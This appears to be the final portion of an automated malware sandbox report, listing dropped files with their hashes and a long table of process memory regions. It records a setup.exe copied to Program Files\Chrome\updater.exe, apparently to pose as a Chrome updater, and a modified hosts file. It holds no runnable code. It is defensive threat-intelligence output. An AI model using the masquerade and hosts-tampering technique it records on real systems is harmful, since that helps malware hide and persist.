                                                3296ed469afaec27dc4dbdbeed395ea5ad113d94423fe5b697bc21ba7e8c24ad

                                                SHA512

                                                12c33f89b7722deb01e9fdb2066115d23bb4df3e08d9963a53fb550ebaae3d2f1d438376e5b82e84907bd969b7e84f3b77bb7ebbeb25466de247a55113ab5ff8

                                              • C:\Windows\Temp\setup.exe
                                                Filesize

                                                7.3MB

                                                MD5

                                                0c9bed327840bbe964e85913d5868fcb

                                                SHA1

                                                ef0b874b57be491ae87ed0237a025d5580265218

                                                SHA256

                                                3296ed469afaec27dc4dbdbeed395ea5ad113d94423fe5b697bc21ba7e8c24ad

                                                SHA512

                                                12c33f89b7722deb01e9fdb2066115d23bb4df3e08d9963a53fb550ebaae3d2f1d438376e5b82e84907bd969b7e84f3b77bb7ebbeb25466de247a55113ab5ff8

                                              • C:\Windows\system32\drivers\etc\hosts
                                                Filesize

                                                1KB

                                                MD5

                                                f3f6968a4c0f457f427eb17f7cc5f68b

                                                SHA1

                                                872933578f4b7d555158189ed02015f192daa7c6

                                                SHA256

                                                774ad8ef51d495bfec8b3e3d058210d5ce715c66f76008f1e4f2b6203d33e41c

                                                SHA512

                                                5dafd8fb0cae325865c0a897e3719250903ac5da72b0fa5006ebda505ee625cd9eacf09c5043c3b3648a5677e96c87f1f2995712471cd1539cd9c73a7e3d0d49

                                              • \Program Files\Chrome\updater.exe
                                                Filesize

                                                7.3MB

                                                MD5

                                                0c9bed327840bbe964e85913d5868fcb

                                                SHA1

                                                ef0b874b57be491ae87ed0237a025d5580265218

                                                SHA256

                                                3296ed469afaec27dc4dbdbeed395ea5ad113d94423fe5b697bc21ba7e8c24ad

                                                SHA512

                                                12c33f89b7722deb01e9fdb2066115d23bb4df3e08d9963a53fb550ebaae3d2f1d438376e5b82e84907bd969b7e84f3b77bb7ebbeb25466de247a55113ab5ff8

                                              • \Windows\Temp\setup.exe
                                                Filesize

                                                7.3MB

                                                MD5

                                                0c9bed327840bbe964e85913d5868fcb

                                                SHA1

                                                ef0b874b57be491ae87ed0237a025d5580265218

                                                SHA256

                                                3296ed469afaec27dc4dbdbeed395ea5ad113d94423fe5b697bc21ba7e8c24ad

                                                SHA512

                                                12c33f89b7722deb01e9fdb2066115d23bb4df3e08d9963a53fb550ebaae3d2f1d438376e5b82e84907bd969b7e84f3b77bb7ebbeb25466de247a55113ab5ff8

                                              • memory/276-167-0x0000000000000000-mapping.dmp
                                              • memory/292-114-0x0000000000000000-mapping.dmp
                                              • memory/292-139-0x0000000000000000-mapping.dmp
                                              • memory/300-86-0x0000000000000000-mapping.dmp
                                              • memory/300-67-0x0000000077A60000-0x0000000077C09000-memory.dmp
                                                Filesize

                                                1.7MB

                                              • memory/300-56-0x0000000000000000-mapping.dmp
                                              • memory/300-108-0x0000000000000000-mapping.dmp
                                              • memory/300-61-0x0000000000400000-0x00000000010BD000-memory.dmp
                                                Filesize

                                                12.7MB

                                              • memory/300-68-0x0000000000400000-0x00000000010BD000-memory.dmp
                                                Filesize

                                                12.7MB

                                              • memory/300-65-0x0000000000400000-0x00000000010BD000-memory.dmp
                                                Filesize

                                                12.7MB

                                              • memory/300-66-0x0000000077A60000-0x0000000077C09000-memory.dmp
                                                Filesize

                                                1.7MB

                                              • memory/432-85-0x0000000000000000-mapping.dmp
                                              • memory/508-145-0x0000000000000000-mapping.dmp
                                              • memory/508-162-0x0000000000000000-mapping.dmp
                                              • memory/508-125-0x0000000000000000-mapping.dmp
                                              • memory/536-131-0x0000000001034000-0x0000000001037000-memory.dmp
                                                Filesize

                                                12KB

                                              • memory/536-133-0x000000000103B000-0x000000000105A000-memory.dmp
                                                Filesize

                                                124KB

                                              • memory/536-163-0x0000000000000000-mapping.dmp
                                              • memory/536-130-0x000007FEED4F0000-0x000007FEEE04D000-memory.dmp
                                                Filesize

                                                11.4MB

                                              • memory/536-132-0x0000000001034000-0x0000000001037000-memory.dmp
                                                Filesize

                                                12KB

                                              • memory/536-129-0x000007FEEE050000-0x000007FEEEA73000-memory.dmp
                                                Filesize

                                                10.1MB

                                              • memory/536-127-0x0000000000000000-mapping.dmp
                                              • memory/564-165-0x0000000000000000-mapping.dmp
                                              • memory/564-140-0x0000000000000000-mapping.dmp
                                              • memory/564-95-0x0000000000000000-mapping.dmp
                                              • memory/664-159-0x0000000000000000-mapping.dmp
                                              • memory/664-72-0x0000000000000000-mapping.dmp
                                              • memory/668-166-0x0000000000000000-mapping.dmp
                                              • memory/764-160-0x0000000000000000-mapping.dmp
                                              • memory/764-109-0x0000000000000000-mapping.dmp
                                              • memory/780-105-0x0000000000000000-mapping.dmp
                                              • memory/804-101-0x0000000000000000-mapping.dmp
                                              • memory/804-93-0x0000000000000000-mapping.dmp
                                              • memory/896-111-0x0000000000000000-mapping.dmp
                                              • memory/932-153-0x0000000000000000-mapping.dmp
                                              • memory/940-158-0x0000000000000000-mapping.dmp
                                              • memory/988-54-0x00000000759F1000-0x00000000759F3000-memory.dmp
                                                Filesize

                                                8KB

                                              • memory/988-60-0x0000000003600000-0x00000000042BD000-memory.dmp
                                                Filesize

                                                12.7MB

                                              • memory/1056-82-0x0000000000000000-mapping.dmp
                                              • memory/1088-77-0x0000000002704000-0x0000000002707000-memory.dmp
                                                Filesize

                                                12KB

                                              • memory/1088-73-0x0000000000000000-mapping.dmp
                                              • memory/1088-75-0x000007FEEEF30000-0x000007FEEF953000-memory.dmp
                                                Filesize

                                                10.1MB

                                              • memory/1088-78-0x000000001B6F0000-0x000000001B9EF000-memory.dmp
                                                Filesize

                                                3.0MB

                                              • memory/1088-80-0x000000000270B000-0x000000000272A000-memory.dmp
                                                Filesize

                                                124KB

                                              • memory/1088-76-0x000007FEEE3D0000-0x000007FEEEF2D000-memory.dmp
                                                Filesize

                                                11.4MB

                                              • memory/1088-79-0x0000000002704000-0x0000000002707000-memory.dmp
                                                Filesize

                                                12KB

                                              • memory/1108-107-0x0000000000000000-mapping.dmp
                                              • memory/1248-142-0x0000000000000000-mapping.dmp
                                              • memory/1256-144-0x0000000000000000-mapping.dmp
                                              • memory/1312-143-0x00000000007A0000-0x00000000007A6000-memory.dmp
                                                Filesize

                                                24KB

                                              • memory/1336-138-0x0000000000000000-mapping.dmp
                                              • memory/1348-90-0x0000000000000000-mapping.dmp
                                              • memory/1384-137-0x0000000000000000-mapping.dmp
                                              • memory/1444-87-0x0000000000000000-mapping.dmp
                                              • memory/1460-106-0x0000000000000000-mapping.dmp
                                              • memory/1472-117-0x0000000001150000-0x0000000001E0D000-memory.dmp
                                                Filesize

                                                12.7MB

                                              • memory/1472-126-0x0000000001150000-0x0000000001E0D000-memory.dmp
                                                Filesize

                                                12.7MB

                                              • memory/1572-97-0x0000000000000000-mapping.dmp
                                              • memory/1580-88-0x0000000000000000-mapping.dmp
                                              • memory/1580-99-0x0000000000000000-mapping.dmp
                                              • memory/1584-104-0x0000000000000000-mapping.dmp
                                              • memory/1584-84-0x0000000000000000-mapping.dmp
                                              • memory/1600-89-0x0000000000000000-mapping.dmp
                                              • memory/1612-94-0x0000000000000000-mapping.dmp
                                              • memory/1612-103-0x0000000000000000-mapping.dmp
                                              • memory/1616-83-0x0000000000000000-mapping.dmp
                                              • memory/1628-164-0x0000000000000000-mapping.dmp
                                              • memory/1628-179-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1628-178-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1628-177-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1628-175-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1628-191-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1628-190-0x00000000000E0000-0x0000000000100000-memory.dmp
                                                Filesize

                                                128KB

                                              • memory/1628-173-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1628-199-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1628-189-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1628-171-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1628-169-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1628-168-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1628-181-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1628-185-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1628-184-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1628-187-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1628-183-0x0000000140000000-0x0000000140803000-memory.dmp
                                                Filesize

                                                8.0MB

                                              • memory/1640-147-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/1640-150-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/1640-156-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/1640-92-0x0000000000000000-mapping.dmp
                                              • memory/1640-152-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/1640-146-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/1640-195-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/1640-151-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/1640-154-0x0000000000401BEA-mapping.dmp
                                              • memory/1640-148-0x0000000000400000-0x000000000040C000-memory.dmp
                                                Filesize

                                                48KB

                                              • memory/1656-71-0x000007FEFC2E1000-0x000007FEFC2E3000-memory.dmp
                                                Filesize

                                                8KB

                                              • memory/1656-69-0x00000000001B0000-0x00000000005CC000-memory.dmp
                                                Filesize

                                                4.1MB

                                              • memory/1656-70-0x000000001BB40000-0x000000001BF5C000-memory.dmp
                                                Filesize

                                                4.1MB

                                              • memory/1696-119-0x0000000000400000-0x00000000010BD000-memory.dmp
                                                Filesize

                                                12.7MB

                                              • memory/1696-121-0x0000000077A60000-0x0000000077C09000-memory.dmp
                                                Filesize

                                                1.7MB

                                              • memory/1696-123-0x0000000077A60000-0x0000000077C09000-memory.dmp
                                                Filesize

                                                1.7MB

                                              • memory/1696-120-0x0000000000400000-0x00000000010BD000-memory.dmp
                                                Filesize

                                                12.7MB

                                              • memory/1696-116-0x0000000000000000-mapping.dmp
                                              • memory/1696-122-0x0000000000400000-0x00000000010BD000-memory.dmp
                                                Filesize

                                                12.7MB

                                              • memory/1700-100-0x0000000000000000-mapping.dmp
                                              • memory/1700-110-0x0000000000000000-mapping.dmp
                                              • memory/1708-196-0x00000000001C0000-0x00000000001C6000-memory.dmp
                                                Filesize

                                                24KB

                                              • memory/1708-157-0x0000000000000000-mapping.dmp
                                              • memory/1708-198-0x0000000000060000-0x0000000000067000-memory.dmp
                                                Filesize

                                                28KB

                                              • memory/1716-102-0x0000000000000000-mapping.dmp
                                              • memory/1716-113-0x0000000000000000-mapping.dmp
                                              • memory/1732-134-0x0000000000000000-mapping.dmp
                                              • memory/1736-141-0x0000000000000000-mapping.dmp
                                              • memory/1772-161-0x0000000000000000-mapping.dmp
                                              • memory/1816-58-0x0000000000000000-mapping.dmp
                                              • memory/1844-91-0x0000000000000000-mapping.dmp
                                              • memory/1928-98-0x0000000000000000-mapping.dmp
                                              • memory/1928-135-0x0000000000000000-mapping.dmp
                                              • memory/1928-59-0x0000000000000000-mapping.dmp
                                              • memory/1932-81-0x0000000000000000-mapping.dmp
                                              • memory/2012-96-0x0000000000000000-mapping.dmp